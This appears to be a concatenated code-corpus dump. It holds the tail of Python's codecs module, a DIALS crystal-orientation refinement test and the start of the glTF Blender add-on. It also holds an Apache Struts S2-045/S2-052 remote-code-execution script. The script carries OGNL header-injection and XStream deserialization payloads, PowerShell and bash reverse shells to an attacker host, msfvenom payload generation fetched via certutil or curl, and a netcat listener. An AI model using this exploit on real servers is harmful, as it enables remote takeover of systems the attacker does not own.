    recoder.data_encoding = data_encoding
    recoder.file_encoding = file_encoding
    return recoder
### Helpers for codec lookup
def getencoder(encoding):
    """Look up the codec for the given encoding and return its encoder
    function.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.encode
def getdecoder(encoding):
    """Look up the codec for the given encoding and return its decoder
    function.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.decode
def getincrementalencoder(encoding):
    """Look up the codec for the given encoding and return its
    IncrementalEncoder class or factory function.

    Raises a LookupError in case the encoding cannot be found or the
    codec doesn't provide an incremental encoder.
    """
    encoder = lookup(encoding).incrementalencoder
    if encoder is None:
        # The codec exists but has no incremental encoder registered.
        raise LookupError(encoding)
    return encoder
def getincrementaldecoder(encoding):
    """Look up the codec for the given encoding and return its
    IncrementalDecoder class or factory function.

    Raises a LookupError in case the encoding cannot be found or the
    codec doesn't provide an incremental decoder.
    """
    decoder = lookup(encoding).incrementaldecoder
    if decoder is None:
        # The codec exists but has no incremental decoder registered.
        raise LookupError(encoding)
    return decoder
def getreader(encoding):
    """Look up the codec for the given encoding and return its
    StreamReader class or factory function.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.streamreader
def getwriter(encoding):
    """Look up the codec for the given encoding and return its
    StreamWriter class or factory function.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.streamwriter
def iterencode(iterator, encoding, errors='strict', **kwargs):
    """Encoding iterator.

    Encode the strings produced by *iterator* using an
    IncrementalEncoder, yielding each non-empty chunk of output.

    errors and kwargs are passed through to the IncrementalEncoder
    constructor.
    """
    encoder = getincrementalencoder(encoding)(errors, **kwargs)
    for item in iterator:
        chunk = encoder.encode(item)
        if chunk:
            yield chunk
    # Flush any state the encoder is still holding.
    tail = encoder.encode("", True)
    if tail:
        yield tail
def iterdecode(iterator, encoding, errors='strict', **kwargs):
    """Decoding iterator.

    Decode the byte strings produced by *iterator* using an
    IncrementalDecoder, yielding each non-empty chunk of output.

    errors and kwargs are passed through to the IncrementalDecoder
    constructor.
    """
    decoder = getincrementaldecoder(encoding)(errors, **kwargs)
    for item in iterator:
        chunk = decoder.decode(item)
        if chunk:
            yield chunk
    # Flush any partial sequence still buffered in the decoder.
    tail = decoder.decode(b"", True)
    if tail:
        yield tail
### Helpers for charmap-based codecs
def make_identity_dict(rng):
    """ make_identity_dict(rng) -> dict

        Return a dictionary where elements of the rng sequence are
        mapped to themselves.
    """
    return dict((element, element) for element in rng)
def make_encoding_map(decoding_map):
    """Create an encoding map from a decoding map.

    If a target mapping in the decoding map occurs multiple times, that
    target is mapped to None (undefined mapping), causing an exception
    when encountered by the charmap codec during translation.

    One example where this happens is cp875.py which decodes multiple
    characters to \\u001a.
    """
    encoding_map = {}
    for key, value in decoding_map.items():
        if value not in encoding_map:
            encoding_map[value] = key
        else:
            # duplicate decode target: mark the reverse mapping undefined
            encoding_map[value] = None
    return encoding_map
### error handlers
# Pre-bind the standard error handlers as module attributes for
# convenient access.
try:
    strict_errors = lookup_error("strict")
    ignore_errors = lookup_error("ignore")
    replace_errors = lookup_error("replace")
    xmlcharrefreplace_errors = lookup_error("xmlcharrefreplace")
    backslashreplace_errors = lookup_error("backslashreplace")
    namereplace_errors = lookup_error("namereplace")
except LookupError:
    # In --disable-unicode builds, these error handlers are missing
    strict_errors = None
    ignore_errors = None
    replace_errors = None
    xmlcharrefreplace_errors = None
    backslashreplace_errors = None
    namereplace_errors = None
# Tell modulefinder that using codecs probably needs the encodings
# package
_false = 0
if _false:
    # Never executed at runtime; the dead import is only seen by
    # static analysis tools such as modulefinder.
    import encodings
### Tests
if __name__ == '__main__':
    # Make stdout translate Latin-1 output into UTF-8 output
    sys.stdout = EncodedFile(sys.stdout, 'latin-1', 'utf-8')
    # Have stdin translate Latin-1 input into UTF-8 input
    sys.stdin = EncodedFile(sys.stdin, 'utf-8', 'latin-1')
| 33.538598 | 85 | 0.604847 |
795c769755c3d79fffcb5270907a526a34c39f00 | 9,477 | py | Python | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | 2 | 2021-03-17T11:25:46.000Z | 2021-11-18T04:20:54.000Z | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | null | null | null | test/algorithms/refinement/test_orientation_refinement.py | TiankunZhou/dials | bd5c95b73c442cceb1c61b1690fd4562acf4e337 | [
"BSD-3-Clause"
] | null | null | null | """
Test refinement of beam, detector and crystal orientation parameters
using generated reflection positions from ideal geometry.
Control of the experimental model and choice of minimiser is done via
PHIL, which means we can do, for example:
cctbx.python tst_orientation_refinement.py \
"random_seed=3; engine=LBFGScurvs"
"""
from __future__ import absolute_import, division, print_function
import sys
def test(args=None):
    """Regression test for scan-static orientation refinement.

    Builds mock experimental models (beam, detector, goniometer, crystal,
    scan), parameterises them, applies known parameter shifts, generates
    synthetic "observed" reflections from the shifted geometry, resets the
    parameters, and refines to recover the shifts.

    :param args: optional list of PHIL command-line strings controlling
        model generation and the choice of minimiser, e.g.
        ``["random_seed=3", "engine=LBFGScurvs"]``.
    """
    # Avoid a mutable default argument; treat "no args" as an empty list.
    if args is None:
        args = []
    from math import pi
    from cctbx.sgtbx import space_group, space_group_symbols
    # Symmetry constrained parameterisation for the unit cell
    from cctbx.uctbx import unit_cell
    # We will set up a mock scan and a mock experiment list
    from dxtbx.model import ScanFactory
    from dxtbx.model.experiment_list import Experiment, ExperimentList
    from libtbx.phil import parse
    from libtbx.test_utils import approx_equal
    from rstbx.symmetry.constraints.parameter_reduction import symmetrize_reduce_enlarge
    from scitbx import matrix
    from scitbx.array_family import flex
    # Get modules to build models and minimiser using PHIL
    import dials.test.algorithms.refinement.setup_geometry as setup_geometry
    import dials.test.algorithms.refinement.setup_minimiser as setup_minimiser
    from dials.algorithms.refinement.parameterisation.beam_parameters import (
        BeamParameterisation,
    )
    from dials.algorithms.refinement.parameterisation.crystal_parameters import (
        CrystalOrientationParameterisation,
        CrystalUnitCellParameterisation,
    )
    # Model parameterisations
    from dials.algorithms.refinement.parameterisation.detector_parameters import (
        DetectorParameterisationSinglePanel,
    )
    # Parameterisation of the prediction equation
    from dials.algorithms.refinement.parameterisation.prediction_parameters import (
        XYPhiPredictionParameterisation,
    )
    from dials.algorithms.refinement.prediction.managed_predictors import (
        ScansExperimentsPredictor,
        ScansRayPredictor,
    )
    from dials.algorithms.refinement.reflection_manager import ReflectionManager
    # Imports for the target function
    from dials.algorithms.refinement.target import (
        LeastSquaresPositionalResidualWithRmsdCutoff,
    )
    # Reflection prediction
    from dials.algorithms.spot_prediction import IndexGenerator, ray_intersection
    #############################
    # Setup experimental models #
    #############################
    master_phil = parse(
        """
      include scope dials.test.algorithms.refinement.geometry_phil
      include scope dials.test.algorithms.refinement.minimiser_phil
      """,
        process_includes=True,
    )
    models = setup_geometry.Extract(master_phil, cmdline_args=args)
    mydetector = models.detector
    mygonio = models.goniometer
    mycrystal = models.crystal
    mybeam = models.beam
    # Build a mock scan for a 180 degree sequence
    sf = ScanFactory()
    myscan = sf.make_scan(
        image_range=(1, 1800),
        exposure_times=0.1,
        oscillation=(0, 0.1),
        epochs=list(range(1800)),
        deg=True,
    )
    sequence_range = myscan.get_oscillation_range(deg=False)
    im_width = myscan.get_oscillation(deg=False)[1]
    assert sequence_range == (0.0, pi)
    assert approx_equal(im_width, 0.1 * pi / 180.0)
    # Build an experiment list
    experiments = ExperimentList()
    experiments.append(
        Experiment(
            beam=mybeam,
            detector=mydetector,
            goniometer=mygonio,
            scan=myscan,
            crystal=mycrystal,
            imageset=None,
        )
    )
    ###########################
    # Parameterise the models #
    ###########################
    det_param = DetectorParameterisationSinglePanel(mydetector)
    s0_param = BeamParameterisation(mybeam, mygonio)
    xlo_param = CrystalOrientationParameterisation(mycrystal)
    xluc_param = CrystalUnitCellParameterisation(mycrystal)
    # Fix beam to the X-Z plane (imgCIF geometry), fix wavelength
    s0_param.set_fixed([True, False, True])
    # Fix crystal parameters
    # xluc_param.set_fixed([True, True, True, True, True, True])
    ########################################################################
    # Link model parameterisations together into a parameterisation of the #
    # prediction equation                                                  #
    ########################################################################
    pred_param = XYPhiPredictionParameterisation(
        experiments, [det_param], [s0_param], [xlo_param], [xluc_param]
    )
    ################################
    # Apply known parameter shifts #
    ################################
    # shift detector by 1.0 mm each translation and 2 mrad each rotation
    det_p_vals = det_param.get_param_vals()
    p_vals = [a + b for a, b in zip(det_p_vals, [1.0, 1.0, 1.0, 2.0, 2.0, 2.0])]
    det_param.set_param_vals(p_vals)
    # shift beam by 2 mrad in free axis
    s0_p_vals = s0_param.get_param_vals()
    p_vals = list(s0_p_vals)
    p_vals[0] += 2.0
    s0_param.set_param_vals(p_vals)
    # rotate crystal a bit (=2 mrad each rotation)
    xlo_p_vals = xlo_param.get_param_vals()
    p_vals = [a + b for a, b in zip(xlo_p_vals, [2.0, 2.0, 2.0])]
    xlo_param.set_param_vals(p_vals)
    # change unit cell a bit (=0.1 Angstrom length upsets, 0.1 degree of
    # gamma angle)
    xluc_p_vals = xluc_param.get_param_vals()
    cell_params = mycrystal.get_unit_cell().parameters()
    cell_params = [a + b for a, b in zip(cell_params, [0.1, 0.1, 0.1, 0.0, 0.0, 0.1])]
    new_uc = unit_cell(cell_params)
    newB = matrix.sqr(new_uc.fractionalization_matrix()).transpose()
    S = symmetrize_reduce_enlarge(mycrystal.get_space_group())
    S.set_orientation(orientation=newB)
    # Scale to the units expected by the parameterisation (1.0e5 factor).
    X = tuple(e * 1.0e5 for e in S.forward_independent_parameters())
    xluc_param.set_param_vals(X)
    #############################
    # Generate some reflections #
    #############################
    print("Reflections will be generated with the following geometry:")
    print(mybeam)
    print(mydetector)
    print(mycrystal)
    print("Target values of parameters are")
    msg = "Parameters: " + "%.5f " * len(pred_param)
    print(msg % tuple(pred_param.get_param_vals()))
    print()
    # All indices in a 2.0 Angstrom sphere
    resolution = 2.0
    index_generator = IndexGenerator(
        mycrystal.get_unit_cell(),
        space_group(space_group_symbols(1).hall()).type(),
        resolution,
    )
    indices = index_generator.to_array()
    # Predict rays within the sequence range
    ray_predictor = ScansRayPredictor(experiments, sequence_range)
    obs_refs = ray_predictor(indices)
    print("Total number of reflections excited", len(obs_refs))
    # Take only those rays that intersect the detector
    intersects = ray_intersection(mydetector, obs_refs)
    obs_refs = obs_refs.select(intersects)
    # Make a reflection predictor and re-predict for all these reflections. The
    # result is the same, but we gain also the flags and xyzcal.px columns
    ref_predictor = ScansExperimentsPredictor(experiments)
    obs_refs["id"] = flex.int(len(obs_refs), 0)
    obs_refs = ref_predictor(obs_refs)
    # Set 'observed' centroids from the predicted ones
    obs_refs["xyzobs.mm.value"] = obs_refs["xyzcal.mm"]
    # Invent some variances for the centroid positions of the simulated data
    im_width = 0.1 * pi / 180.0
    px_size = mydetector[0].get_pixel_size()
    var_x = flex.double(len(obs_refs), (px_size[0] / 2.0) ** 2)
    var_y = flex.double(len(obs_refs), (px_size[1] / 2.0) ** 2)
    var_phi = flex.double(len(obs_refs), (im_width / 2.0) ** 2)
    obs_refs["xyzobs.mm.variance"] = flex.vec3_double(var_x, var_y, var_phi)
    print("Total number of observations made", len(obs_refs))
    ###############################
    # Undo known parameter shifts #
    ###############################
    s0_param.set_param_vals(s0_p_vals)
    det_param.set_param_vals(det_p_vals)
    xlo_param.set_param_vals(xlo_p_vals)
    xluc_param.set_param_vals(xluc_p_vals)
    print("Initial values of parameters are")
    msg = "Parameters: " + "%.5f " * len(pred_param)
    print(msg % tuple(pred_param.get_param_vals()))
    print()
    #####################################
    # Select reflections for refinement #
    #####################################
    refman = ReflectionManager(obs_refs, experiments)
    ##############################
    # Set up the target function #
    ##############################
    # The current 'achieved' criterion compares RMSD against 1/3 the pixel size and
    # 1/3 the image width in radians. For the simulated data, these are just made up
    mytarget = LeastSquaresPositionalResidualWithRmsdCutoff(
        experiments, ref_predictor, refman, pred_param, restraints_parameterisation=None
    )
    ################################
    # Set up the refinement engine #
    ################################
    refiner = setup_minimiser.Extract(
        master_phil, mytarget, pred_param, cmdline_args=args
    ).refiner
    print("Prior to refinement the experimental model is:")
    print(mybeam)
    print(mydetector)
    print(mycrystal)
    refiner.run()
    print()
    print("Refinement has completed with the following geometry:")
    print(mybeam)
    print(mydetector)
    print(mycrystal)
if __name__ == "__main__":
    # Forward any command-line arguments (PHIL strings) to the test.
    test(args=sys.argv[1:])
| 34.212996 | 88 | 0.652105 |
795c76e73138530bad4f876a2c755b6861bc4164 | 10,333 | py | Python | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-051-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | 2 | 2021-12-02T17:50:14.000Z | 2021-12-02T17:50:16.000Z | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-052-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | null | null | null | S2-045_n_S2-052_rce.py | m4udSec/S2-045-and-S2-052-Struts-2-in-1 | 654ad5df594542f13392c5fa4a3915fe024f278b | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Author (m4ud)
# Apache Struts-045
# CVE : 2017-5638
from base64 import b64encode
import sys
import requests
from optparse import OptionParser
import os
import subprocess
import http.server
import threading
import time
def serverShutdown(server):
    """Stop the payload-serving HTTP server and report shutdown.

    NOTE(review): the ``server`` parameter is immediately shadowed by a
    freshly constructed ``struts(options)`` instance, and ``options`` is not
    defined in this scope (it is local to ``main``), so calling this function
    raises ``NameError``. The function appears unused/broken as written —
    verify before relying on it.
    """
    server = struts(options)
    server.stop()
    print("Shutting Server down!")
class struts:
def __init__(self, options):
self.target = options.target
self.directory = options.directory
self.command = options.command
self.rport = options.rport
self.osys = options.osys
self.lport = options.lport
self.lhost = options.lhost
self.wport = options.wport
self.shell = options.shell
self.xploit = options.xploit
self.target = 'http://' + options.target #Vulnerable Server
port = self.rport
directory = self.directory # Struts Application directory
cmd = self.command
def srv(self):
server_address = (self.lhost, int(self.wport))
global httpd
self.httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.start()
print("\r\n[+] (m4ud) AS-045 RCE [+]\r\n")
print("[+] Serving Payload at port " + str(self.wport) +" [+]\r\n")
return self.httpd
def stop(self):
print("\r\n[+] Shutting Server down! [+]\r\n")
self.httpd.shutdown()
self.httpd.server_close()
def pwrsh(self):
print("\r\n[+] (m4ud) AS-045 RCE [+]")
print("\r\n[*] Deploying PowerShell [*]\r\n")
payload = "$client = New-Object System.Net.Sockets.TCPClient('" + self.lhost + "'," + str(self.lport) + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS(m4ud) ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
payload = b64encode(payload.encode('UTF-16LE')).decode()
return payload
def bsh():
payload = "bash -i >&/dev/tcp/%s/%s 0>&1" % (self.lhost, str(self.lport))
return payload
def venom(self, shell, ext):
os.system("msfvenom -p "+ shell + "/shell_reverse_tcp LHOST=" + self.lhost+ " LPORT="+ str(self.lport) + " -f "+ ext+ " > shelb")
def exp(self):
if self.osys == "1":
shell = "windows"
ext = "exe"
if self.command is not None:
cmd = self.command
cmd = b64encode(cmd.encode('UTF-16LE')).decode()
if self.shell == "1":
cmd = self.pwrsh()
elif self.shell == "2":
self.venom(shell, ext)
self.srv()
os.system('mv shelb shelb.exe')
cmd = "certutil -urlcache -f -split http://%s:%s/shelb.exe;.\shelb.exe" % (self.lhost, self.wport)
cmd = b64encode(cmd.encode('UTF-16LE')).decode()
if self.osys == "2":
shell = "linux"
ext = "elf"
if self.shell == "1":
cmd = bsh()
elif self.shell == "2":
venom(shell, ext)
cmd = "curl http://%s/shelb |bash"
cmd = bsh()
URL = self.target + ':' + str(self.rport) + '/' + self.directory + '/'
if self.xploit == "1":
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'powershell.exe','-nop','-e',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
else:
payload = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>powershell.exe</string>
<string>-nop</string>
<string>-e</string>
<string>""" + cmd + """\n</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>mwxNZJ805CPS7DKLm1rUgET1</name>
</filter>
<next class="string">xkruIdjzook1CwMqglq04G0rmN0Sz</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>"""
headers = {'Content-Type': 'application/xml', 'Connection': 'close',}
if self.command is None and self.shell == "2" and self.xploit == "1":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.get(URL, headers=headers)
f.communicate()
except KeyboardInterrupt:
t2 = threading.Thread(target=self.stop())
t2.daemon = True
t2.start()
print("Bye")
sys.exit()
elif self.command is None and self.shell == "1" and self.xploit == "1":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.get(URL, headers=headers)
f.communicate()
except KeyboardInterrupt:
print("Bye")
sys.exit()
elif self.command is not None:
while True:
try:
r = requests.get(URL, headers=headers)
except KeyboardInterrupt:
print("Bye")
sys.exit()
elif self.command is None and self.shell == "2" and self.xploit == "2":
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.post(URL, headers=headers, data=payload)
f.communicate()
except KeyboardInterrupt:
t2 = threading.Thread(target=self.stop())
t2.daemon = True
t2.start()
print("Bye")
sys.exit()
# elif self.command is None and self.shell == "1" and self.xploit == "1":
else:
while True:
try:
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
r = requests.post(URL, headers=headers, data=payload)
f.communicate()
except KeyboardInterrupt:
print("Bye")
sys.exit()
def main():
    """Parse command-line options and run the tool against the given target.

    Requires at least ``-t/--target``; all other options have defaults or are
    optional. NOTE(review): ``optparse`` has been deprecated since Python 2.7
    in favour of ``argparse``; also, with ``default=8080``/``9001``/``4443``
    the port options arrive as ``int`` only when defaulted but as ``str``
    when supplied by the user — downstream code wraps them in ``str(...)``,
    which masks this inconsistency.
    """
    parser = OptionParser()
    parser.add_option("-p", "--rport", dest="rport", default=8080, help="RPORT, ")
    parser.add_option("-t", "--target", dest="target", help="Vulnerable Target, ")
    parser.add_option("-d", "--dir", dest="directory",default='struts2-rest-showcase', help="Struts Application directory, ")
    parser.add_option("-c", "--command", dest="command", help="System Command, ")
    parser.add_option("-o", "--os", dest="osys", help="Choose OS: Windows = 1, Linux = 2")
    parser.add_option("-l", "--lhost", dest="lhost", help="LHOST")
    parser.add_option("-P", "--lport", dest="lport",default=9001 ,help="LPORT")
    parser.add_option("-w", "--wport", dest="wport", default=4443, help="WPORT")
    parser.add_option("-s", "--shell", dest="shell", help="Shell type: 1 = powershell or bash, and 2 = msfvenom")
    parser.add_option("-x","--xploit", dest="xploit",default="1", help="1 = S2-045 and 2 = S2-52")
    # Only proceed when a target was supplied; otherwise exit silently.
    (options, args) = parser.parse_args()
    if options.target:
        server = struts(options)
        server.exp()
# Script entry point.
if __name__ == "__main__":
    main()
| 39.288973 | 546 | 0.566438 |
795c771e9ffa843ee2865de0b785fc3df23c6e22 | 32,484 | py | Python | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | 2 | 2020-02-04T05:21:42.000Z | 2020-08-29T09:49:06.000Z | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | null | null | null | addons/io_scene_gltf2/__init__.py | julienduroure/glTF-Blender-IO | 406a409d4740e6a67ec3e8699c7dec40afe5067e | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2019 The glTF-Blender-IO authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Add-on metadata consumed by Blender's add-on manager (name, version,
# minimum Blender version, menu location, docs/tracker links, etc.).
bl_info = {
    'name': 'glTF 2.0 format',
    'author': 'Julien Duroure, Norbert Nopper, Urs Hanselmann, Moritz Becher, Benjamin Schmithüsen, Jim Eckerlein, and many external contributors',
    "version": (1, 1, 0),
    'blender': (2, 81, 6),
    'location': 'File > Import-Export',
    'description': 'Import-Export as glTF 2.0',
    'warning': '',
    'wiki_url': "https://docs.blender.org/manual/en/latest/addons/io_scene_gltf2.html",
    'tracker_url': "https://github.com/KhronosGroup/glTF-Blender-IO/issues/",
    'support': 'OFFICIAL',
    'category': 'Import-Export',
}
def get_version_string():
    """Return the add-on version from ``bl_info`` as a dotted string, e.g. ``"1.1.0"``.

    Joins all components of the version tuple, so it keeps working if the
    tuple ever grows beyond three elements (the original hard-coded exactly
    three indices).
    """
    return '.'.join(str(component) for component in bl_info['version'])
#
# Script reloading (if the user calls 'Reload Scripts' from Blender)
#
def reload_package(module_dict_main):
    """Recursively reload every already-imported submodule of this package.

    Walks the package directory tree; any ``.py`` file (other than
    ``__init__``) whose stem appears in the given module dict is reloaded,
    and subdirectories are descended into via the submodule's namespace.
    """
    import importlib
    from pathlib import Path

    def _reload_recursive(directory, module_dict):
        for entry in directory.iterdir():
            # Skip __init__ modules and files that were never imported.
            if "__init__" in str(entry) or entry.stem not in module_dict:
                continue
            if entry.is_file() and entry.suffix == ".py":
                importlib.reload(module_dict[entry.stem])
            elif entry.is_dir():
                _reload_recursive(entry, module_dict[entry.stem].__dict__)

    _reload_recursive(Path(__file__).parent, module_dict_main)
if "bpy" in locals():
reload_package(locals())
import bpy
from bpy.props import (StringProperty,
BoolProperty,
EnumProperty,
IntProperty,
CollectionProperty)
from bpy.types import Operator
from bpy_extras.io_utils import ImportHelper, ExportHelper
#
# Functions / Classes.
#
class ExportGLTF2_Base:
    """Shared property definitions and export driver for the glTF 2.0 exporter.

    Mixed into the concrete export operator(s); declares every user-facing
    export option as a Blender property, remembers/restores settings on the
    scene, and translates the options into the ``export_settings`` dict
    consumed by ``gltf2_blender_export.save``. The class also carries a
    legacy tabbed ``draw`` UI for Blender < 2.80.
    """
    # TODO: refactor to avoid boilerplate
    def __init__(self):
        # Probe once per operator instance whether the optional Draco
        # compression shared library is present.
        from io_scene_gltf2.io.exp import gltf2_io_draco_compression_extension
        self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()
    bl_options = {'UNDO', 'PRESET'}
    export_format = EnumProperty(
        name='Format',
        items=(('GLB', 'glTF Binary (.glb)',
                'Exports a single file, with all data packed in binary form. '
                'Most efficient and portable, but more difficult to edit later'),
               ('GLTF_EMBEDDED', 'glTF Embedded (.gltf)',
                'Exports a single file, with all data packed in JSON. '
                'Less efficient than binary, but easier to edit later'),
               ('GLTF_SEPARATE', 'glTF Separate (.gltf + .bin + textures)',
                'Exports multiple files, with separate JSON, binary and texture data. '
                'Easiest to edit later')),
        description=(
            'Output format and embedding options. Binary is most efficient, '
            'but JSON (embedded or separate) may be easier to edit later'
        ),
        default='GLB'
    )
    # NOTE(review): 'ui_tab' items do not include 'MATERIALS', but the legacy
    # draw() below dispatches on 'MATERIALS' to a draw_material_settings()
    # method that is not defined in this class — that branch is unreachable
    # as written; verify before extending the tab list.
    ui_tab = EnumProperty(
        items=(('GENERAL', "General", "General settings"),
               ('MESHES', "Meshes", "Mesh settings"),
               ('OBJECTS', "Objects", "Object settings"),
               ('ANIMATION', "Animation", "Animation settings")),
        name="ui_tab",
        description="Export setting categories",
    )
    export_copyright = StringProperty(
        name='Copyright',
        description='Legal rights and conditions for the model',
        default=''
    )
    export_image_format = EnumProperty(
        name='Images',
        items=(('NAME', 'Automatic',
                'Determine the image format from the blender image name'),
               ('JPEG', 'JPEG Format (.jpg)',
                'Encode and save textures as .jpg files. Be aware of a possible loss in quality'),
               ('PNG', 'PNG Format (.png)',
                'Encode and save textures as .png files')
               ),
        description=(
            'Output format for images. PNG is lossless and generally preferred, but JPEG might be preferable for web '
            'applications due to the smaller file size'
        ),
        default='NAME'
    )
    export_texcoords = BoolProperty(
        name='UVs',
        description='Export UVs (texture coordinates) with meshes',
        default=True
    )
    export_normals = BoolProperty(
        name='Normals',
        description='Export vertex normals with meshes',
        default=True
    )
    export_draco_mesh_compression_enable = BoolProperty(
        name='Draco mesh compression',
        description='Compress mesh using Draco',
        default=False
    )
    export_draco_mesh_compression_level = IntProperty(
        name='Compression level',
        description='Compression level (0 = most speed, 6 = most compression, higher values currently not supported)',
        default=6,
        min=0,
        max=6
    )
    export_draco_position_quantization = IntProperty(
        name='Position quantization bits',
        description='Quantization bits for position values (0 = no quantization)',
        default=14,
        min=0,
        max=30
    )
    export_draco_normal_quantization = IntProperty(
        name='Normal quantization bits',
        description='Quantization bits for normal values (0 = no quantization)',
        default=10,
        min=0,
        max=30
    )
    export_draco_texcoord_quantization = IntProperty(
        name='Texcoord quantization bits',
        description='Quantization bits for texture coordinate values (0 = no quantization)',
        default=12,
        min=0,
        max=30
    )
    export_tangents = BoolProperty(
        name='Tangents',
        description='Export vertex tangents with meshes',
        default=False
    )
    export_materials = BoolProperty(
        name='Materials',
        description='Export materials',
        default=True
    )
    export_colors = BoolProperty(
        name='Vertex Colors',
        description='Export vertex colors with meshes',
        default=True
    )
    export_cameras = BoolProperty(
        name='Cameras',
        description='Export cameras',
        default=False
    )
    export_selected = BoolProperty(
        name='Selected Objects',
        description='Export selected objects only',
        default=False
    )
    export_extras = BoolProperty(
        name='Custom Properties',
        description='Export custom properties as glTF extras',
        default=False
    )
    export_yup = BoolProperty(
        name='+Y Up',
        description='Export using glTF convention, +Y up',
        default=True
    )
    export_apply = BoolProperty(
        name='Apply Modifiers',
        description='Apply modifiers (excluding Armatures) to mesh objects -'
                    'WARNING: prevents exporting shape keys',
        default=False
    )
    export_animations = BoolProperty(
        name='Animations',
        description='Exports active actions and NLA tracks as glTF animations',
        default=True
    )
    export_frame_range = BoolProperty(
        name='Limit to Playback Range',
        description='Clips animations to selected playback range',
        default=True
    )
    export_frame_step = IntProperty(
        name='Sampling Rate',
        description='How often to evaluate animated values (in frames)',
        default=1,
        min=1,
        max=120
    )
    export_force_sampling = BoolProperty(
        name='Always Sample Animations',
        description='Apply sampling to all animations',
        default=True
    )
    export_nla_strips = BoolProperty(
        name='NLA Strips',
        description='Export NLA Strip animations',
        default=True
    )
    export_def_bones = BoolProperty(
        name='Export Deformation bones only',
        description='Export Deformation bones only (and needed bones for hierarchy)',
        default=False
    )
    export_current_frame = BoolProperty(
        name='Use Current Frame',
        description='Export the scene in the current animation frame',
